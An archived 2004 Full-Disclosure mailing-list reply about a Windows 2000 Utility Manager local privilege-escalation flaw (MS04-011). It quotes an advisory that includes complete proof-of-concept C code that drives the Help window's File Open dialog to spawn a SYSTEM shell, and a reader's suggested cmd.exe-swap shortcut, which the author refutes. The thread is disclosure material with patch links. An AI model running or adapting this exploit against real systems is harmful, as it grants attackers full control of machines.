Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....

From: Esteban Martínez Fayó (secemf_at_yahoo.com.ar)
Date: 04/22/04

  • Next message: Honza Vlach: "[Full-Disclosure] Re: Outbreak of a virus on campus, scanning tcp 80/6129/1025/3127" 
    To: <full-disclosure@lists.netsys.com>, "natch" <lists@natch.net>
Date: Wed, 21 Apr 2004 23:19:12 -0300

    ----- Original Message -----
    From: "natch" <lists@natch.net>
    To: <full-disclosure@lists.netsys.com>
    Sent: Monday, April 19, 2004 1:49 PM
    Subject: Re: [Full-Disclosure] Norton AntiVirus nested file manual scan
    bypass.....

    > Nice, but the faster method is to copy \winnt\system32\cmd.exe to
    > \winnt\winhlp32.exe (can be done as a normal user), hit win+u, then f1.

    You are wrong. A normal user cannot overwrite \winnt\winhlp32.exe with the
    default NTFS file permissions of Windows 2000.

    > When the command prompt comes up it has elevated privileges. From there
    > you can run MMC.exe, open up \winnt\system32\lusrmgr.msc and create a
    > new account.
    >
    > No external program needed. The microsoft patch simply removes the
    > contextual help.
    >
    > -
    > natch
    >
    > Vivek Rathod (Application Security, Inc.) wrote:
    >
    > > Microsoft Windows Utility Manager Vulnerability
    > >
    > > April 13, 2004
    > >
    > > Risk Level: High
    > >
    > > Summary:
    > > A local elevation of privileges vulnerability exists on the Windows
    > > Utility
    > > Manager that allows to any user to take complete control over the
    > > operating
    > > system.
    > >
    > > Versions Affected:
    > > All products in the Windows 2000 operating system family.
    > >
    > > Details:
    > > Microsoft Windows 2000 contains support for Accessibility options
    > > within the
    > > operating system. Accessibility support is a series of assistive
    > > technologies
    > > within Windows that allow users with disabilities to still be able to
    > > access the
    > > functions of the operating system. Accessibility support is enabled or
    > > disabled
    > > through shortcuts built into the operating system, or through the
    > > Accessibility
    > > Utility Manager. The Utility Manager is an accessibility utility that
    > > allows
    > > users to check the status of Accessibility programs (Magnifier,
    > > Narrator, On-
    > > Screen Keyboard) and start or stop them. The Utility Manager can be
    > > invoked by
    > > pressing Windows Key + U or executing "utilman.exe /start" from the
    > > command
    > > line. The Utility Manager Service is enabled by default and runs in the
    > > interactive desktop with Local System privileges.
    > >
    > > The Utility Manager has support for context sensitive help. Users can
    > > access
    > > this by clicking in the "?" on the title bar and then on an object or by
    > > pressing the F1 key after selecting an object. In order to display the
    > > help,
    > > Utility Manager loads winhlp32.exe but does not drop System privileges.
    > > Therefore, winhlp32.exe is executed under the Local System account.
    While
    > > winhlp32.exe is executing it is possible to send Windows messages to
    > > it and
    > > attack it with "Shatter" style attacks.
    > >
    > > Winhlp32.exe is executed with its main window hidden but it is very
    > > trivial to
    > > make it visible. Once the window is made visible, a typical attack would
    > > involve using the “File Open” dialog to execute a program such as
    > > “cmd.exe.”
    > > Since the Help window has Local System privileges, the executed
    > > program will
    > > have the same privileges.
    > >
    > > Further information is available at:
    > > http://www.appsecinc.com/resources/alerts/general/04-0001.html
    > > http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
    > > http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
    > >
    > > Fix:
    > >
    http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en
    > >
    > >
    > > Acknowledgments:
    > > Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application
    > > Security, Inc. (http://www.appsecinc.com) and to
    > > Brett Moore of Security-Assessment.com (http://security-assessment.com).
    > >
    > > Please find the proof-of-concept exploit code attached
    > >
    > > ___________________________________________
    > > AppSecInc Team SHATTER
    > > Tel: 1-866-927-7732
    > > E-mail: shatter@appsecinc.com
    > > Web: www.appsecinc.com
    > >
    > > Application Security, Inc.
    > > "Securing Business by Securing Enterprise Applications"
    > >
    > > ------------------------------------------------------------------------
    > >
    > > // By Cesar Cerrudo (cesar@appsecinc.com)
    > > // Local elevation of priviliges exploit for Windows Utility Manager
    > > // Gives you a shell with system privileges
    > > // If you have problems try changing Sleep() values.
    > >
    > > #include <stdio.h> #include <windows.h> #include <commctrl.h>
    > > #include <Winuser.h>
    > >
    > > int main(int argc, char *argv[]) { HWND lHandle, lHandle2;
    > > POINT point;
    > >
    > > char sText[]="%windir%\\system32\\cmd.ex?";
    > >
    > > // run utility manager
    > > system("utilman.exe /start");
    > > Sleep(500);
    > >
    > > // execute contextual help
    > > SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
    > > Sleep(500);
    > >
    > > // open file open dialog windown in Windows Help
    > > PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
    > > Sleep(500);
    > >
    > > // find open file dialog window
    > > lHandle = FindWindow("#32770","Open");
    > >
    > > // get input box handle
    > > lHandle2 = GetDlgItem(lHandle, 0x47C);
    > > Sleep(500);
    > >
    > > // set text to filter listview to display only cmd.exe
    > > SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
    > > Sleep(800);
    > >
    > > // send return
    > > SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
    > >
    > > //get navigation bar handle
    > > lHandle2 = GetDlgItem(lHandle, 0x4A0);
    > > //send tab
    > > SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
    > > Sleep(500);
    > > lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
    > > //get list view handle
    > > lHandle2 = GetDlgItem(lHandle2, 0x1);
    > >
    > > SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
    > > SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
    > > SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
    > > Sleep(500);
    > >
    > > // popup context menu
    > > PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
    > > Sleep(1000);
    > >
    > > // get context menu handle
    > > point.x =10; point.y =30;
    > > lHandle2=WindowFromPoint(point);
    > >
    > > SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    > > SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
    > > SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
    > >
    > > SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
    > >
    > > return(0);
    > > }
    > >
    > >
    > >
    > >
    > >
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Honza Vlach: "[Full-Disclosure] Re: Outbreak of a virus on campus, scanning tcp 80/6129/1025/3127"

    Relevant Pages

    • Re: I want to migrate to Linux
      ... Microsoft considers the x86 platform to still be what it was when it was ... Dirty Operating System"; not to be confused with the Q-DOS ... 1.x versions had a GUI called Presentation Manager, from which the Windows ... Thompson has stated that GNU/Linux and cousins are all de facto UNIX ...
      (comp.os.linux.hardware)
    • Re: Newbie to WCE!
      ... Windows CE, which is a full-blown operating system, just like Windows XP, ... the chip maker for the BSP if they have one (there ... All I want to know is can I buy a microcontroller chip (One of the chips ...
      (microsoft.public.windowsce.embedded)
    • [Full-disclosure] - IRISH VIRUS - DoS Security Bypass and System access
      ... THE operating system ... Apple Computer Apple DOS ... Windows CE ... LOLDONGS Research, a Wholly Owned Subsidiary of Banned Town Security ...
      (Full-Disclosure)
    • Re: Why most run Microsoft, not RedHat
      ... re-install has happened more than that. ... Heck, even Steve Ballmer, CEO for Microsoft needs to re-install Windows ... We have an enterprise grade firewall behind the router. ... The main problems I encounter again and again are with clueless operators who've ignored repeated instructions about dangerous surfing practices and clicking on attachments - those are the two most common causes of problems - are they caused by the operating system? ...
      (Fedora)
    • Novell Client login form enables reading and writing from and to the clipboard of the logged-in
      ... Novell Client for Windows, ... Anyone with access to the computer's local operating system console, ... inject its own textual content into the clipboard of the currently logged-in ...
      (Bugtraq)
    • Quantcast